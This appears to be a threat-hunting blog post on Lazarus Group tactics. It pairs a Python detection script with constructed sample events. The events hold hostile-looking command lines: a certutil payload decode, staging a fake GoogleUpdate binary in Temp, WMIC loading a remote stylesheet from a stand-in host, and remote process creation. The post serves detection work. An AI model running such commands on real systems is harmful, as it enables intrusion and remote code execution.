In the ever-evolving world of cybersecurity, understanding and anticipating threats has become a critical necessity. One such threat is the notorious Lazarus Group, known for their sophisticated cyber attack tactics. This blog delves into the specific TTPs (Tactics, Techniques, and Procedures) attributed to the Lazarus Group and potential ways to hunt for these activities in network logs.

The Lazarus Group has been known to leverage various techniques for gaining initial access to systems, such as phishing via DOCX files and using LNK files within RAR archives. Threat hunters can look for specific anomalies such as child processes of winword.exe, in particular winword.exe spawning a LOLBAS binary. Additionally, any browser with a command line parameter containing “.pdf”, or explorer.exe launching cmd.exe with “mkdir” or “copy” in the process command line, may indicate malicious activity.

Once access is gained, the group often uses scheduled tasks to execute remote payloads via wmic.exe. Hunting for this activity could involve looking for svchost.exe with “Schedule” in the command line spawning any child process with “http” or “https” in the child command line, or taskhostw.exe or taskeng.exe spawning any child process with “http” or “https” in the child command line.

Evasion is a key part of the Lazarus Group’s playbook. They’ve been known to use PowerShdll for executing PowerShell via DLL, certutil.exe to decode payloads, and rundll32.exe and regsvr32.exe to execute malware. They’ve also been seen using DOCX files with remote templates and VS Code to launch malicious powershell.exe scripts. This provides a range of hunting opportunities for cybersecurity professionals.

The Lazarus Group uses wmic.exe for lateral movement, executing code on other machines. Any process command line containing “/node:” and “PROCESS CALL CREATE” can potentially indicate this activity.

To maintain persistence, the group places an LNK file in the Startup folder that calls a binary in %TEMP%, disguised as Google Update. There are several potential hunting points here, including all processes with a parent of explorer.exe and a grandparent of userinit.exe, explorer.exe spawning a binary located in any folder path containing “Temp” or “Tmp”, or explorer.exe spawning cmd.exe or powershell.exe which in turn spawns another binary located in any folder path containing “Temp” or “Tmp”.
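The hunts described in the initial-access, scheduled-task, lateral-movement and persistence paragraphs above all reduce to predicates over process-creation telemetry (image, command line, parent, grandparent). The following is an added example, not code from the original post, that encodes those hunts as Python rules and runs them over a handful of constructed Sysmon-style events. The field names (`image`, `command_line`, `parent_image`, `parent_command_line`, `grandparent_image`), the short LOLBAS and browser lists, and every host name, path and URL in the sample events are assumptions made for the example.

```python
"""Process-creation hunting rules for the Lazarus Group behaviours described
in the post. Added example; field names, LOLBAS subset and sample events are
assumptions, not data from the post."""
import ntpath
import re

# Assumption: a small subset of LOLBAS binaries. A real hunt would load the
# full LOLBAS project list instead of hard-coding a few names.
LOLBAS = {"certutil.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe",
          "wmic.exe", "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
SCHEDULER_HOSTS = {"taskhostw.exe", "taskeng.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# Match a *folder* named Temp/Tmp rather than any substring (avoids "Templates").
TEMP_PATH = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)


def _name(path):
    """Lower-cased file name of an image path ('' when the field is missing)."""
    return ntpath.basename(path or "").lower()


def r_winword_spawns_lolbas(ev):
    """Initial access: Word spawning a living-off-the-land binary."""
    return _name(ev["parent_image"]) == "winword.exe" and _name(ev["image"]) in LOLBAS


def r_browser_pdf_argument(ev):
    """Initial access: browser launched with a .pdf on its command line."""
    return _name(ev["image"]) in BROWSERS and ".pdf" in ev["command_line"].lower()


def r_explorer_cmd_mkdir_copy(ev):
    """Initial access: explorer.exe -> cmd.exe staging files with mkdir/copy."""
    cl = ev["command_line"].lower()
    return (_name(ev["parent_image"]) == "explorer.exe"
            and _name(ev["image"]) == "cmd.exe"
            and ("mkdir" in cl or "copy" in cl))


def r_scheduled_task_remote_payload(ev):
    """Execution: task scheduler child whose command line references http(s)."""
    parent = _name(ev["parent_image"])
    from_scheduler = ((parent == "svchost.exe"
                       and "schedule" in ev["parent_command_line"].lower())
                      or parent in SCHEDULER_HOSTS)
    return from_scheduler and "http" in ev["command_line"].lower()


def r_wmic_remote_process_create(ev):
    """Lateral movement: wmic.exe /node:<host> process call create ..."""
    cl = ev["command_line"].lower()
    return "/node:" in cl and "process call create" in cl


def r_explorer_spawns_temp_binary(ev):
    """Persistence: explorer.exe directly running a binary out of a Temp/Tmp folder."""
    return _name(ev["parent_image"]) == "explorer.exe" and bool(TEMP_PATH.search(ev["image"]))


def r_explorer_shell_spawns_temp_binary(ev):
    """Persistence: explorer.exe -> cmd/powershell -> binary in a Temp/Tmp folder."""
    return (_name(ev["grandparent_image"]) == "explorer.exe"
            and _name(ev["parent_image"]) in SHELLS
            and bool(TEMP_PATH.search(ev["image"])))


def r_startup_item_triage(ev):
    """Persistence triage: parent explorer.exe, grandparent userinit.exe.
    Noisy by design (fires on normal logon-shell children); use it to
    baseline Startup-folder launches, not as an alert."""
    return (_name(ev["parent_image"]) == "explorer.exe"
            and _name(ev["grandparent_image"]) == "userinit.exe")


RULES = [r_winword_spawns_lolbas, r_browser_pdf_argument, r_explorer_cmd_mkdir_copy,
         r_scheduled_task_remote_payload, r_wmic_remote_process_create,
         r_explorer_spawns_temp_binary, r_explorer_shell_spawns_temp_binary,
         r_startup_item_triage]


def hunt(events):
    """Return {event_id: [rule names that fired]} for events matching any rule."""
    hits = {}
    for ev in events:
        fired = [rule.__name__[2:] for rule in RULES if rule(ev)]
        if fired:
            hits[ev["id"]] = fired
    return hits


def _ev(eid, image, command_line, parent_image, parent_command_line="", grandparent_image=""):
    return {"id": eid, "image": image, "command_line": command_line,
            "parent_image": parent_image, "parent_command_line": parent_command_line,
            "grandparent_image": grandparent_image}


# Constructed sample telemetry (hosts, users, paths and URLs are invented).
SAMPLE_EVENTS = [
    _ev("e1", r"C:\Windows\System32\certutil.exe",
        r"certutil.exe -decode C:\Users\alice\AppData\Local\Temp\a.txt C:\Users\alice\AppData\Local\Temp\a.exe",
        r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    _ev("e2", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        r'"chrome.exe" "C:\Users\alice\Downloads\invoice.pdf"', r"C:\Windows\explorer.exe"),
    _ev("e3", r"C:\Windows\System32\cmd.exe",
        r'cmd.exe /c mkdir "%TEMP%\GoogleUpdate" & copy payload.bin "%TEMP%\GoogleUpdate\gu.exe"',
        r"C:\Windows\explorer.exe"),
    _ev("e4", r"C:\Windows\System32\wbem\WMIC.exe",
        r'wmic.exe os get /format:"https://cdn.example.invalid/update.xsl"',
        r"C:\Windows\System32\svchost.exe", r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule"),
    _ev("e5", r"C:\Windows\System32\wbem\WMIC.exe",
        r'wmic.exe /node:"FILESRV01" process call create "cmd.exe /c dir"', r"C:\Windows\System32\cmd.exe"),
    _ev("e6", r"C:\Users\alice\AppData\Local\Temp\GoogleUpdate.exe",
        r"C:\Users\alice\AppData\Local\Temp\GoogleUpdate.exe",
        r"C:\Windows\explorer.exe", "", r"C:\Windows\System32\userinit.exe"),
    _ev("e7", r"C:\Program Files\7-Zip\7zFM.exe", "7zFM.exe",
        r"C:\Windows\explorer.exe", "", r"C:\Windows\System32\userinit.exe"),
    _ev("e8", r"C:\Users\alice\AppData\Local\Temp\svc.exe", "svc.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "", r"C:\Windows\explorer.exe"),
    _ev("e9", r"C:\Windows\System32\sdclt.exe", "sdclt.exe /run",
        r"C:\Windows\System32\svchost.exe", r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule"),
]

if __name__ == "__main__":
    for eid, fired in hunt(SAMPLE_EVENTS).items():
        print(eid, "->", ", ".join(fired))
```

Each rule maps to one sentence of the post, so a hit can be triaged against the behaviour it was written for. Note that `e7` (a normal program started from explorer.exe) fires only the triage rule, which is why that hunt is better used to build a baseline than to page an analyst, while `e9` (a benign scheduled-task child with no URL on its command line) fires nothing.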

While these techniques provide a way to detect the Lazarus Group’s activities, it’s important to note that these are not exhaustive, and a clean sweep of these hunts does not guarantee a secure network. Cybersecurity requires continuous vigilance and adaptation to evolving threats. The Lazarus Group is just one among many, and the techniques they employ today may change tomorrow.
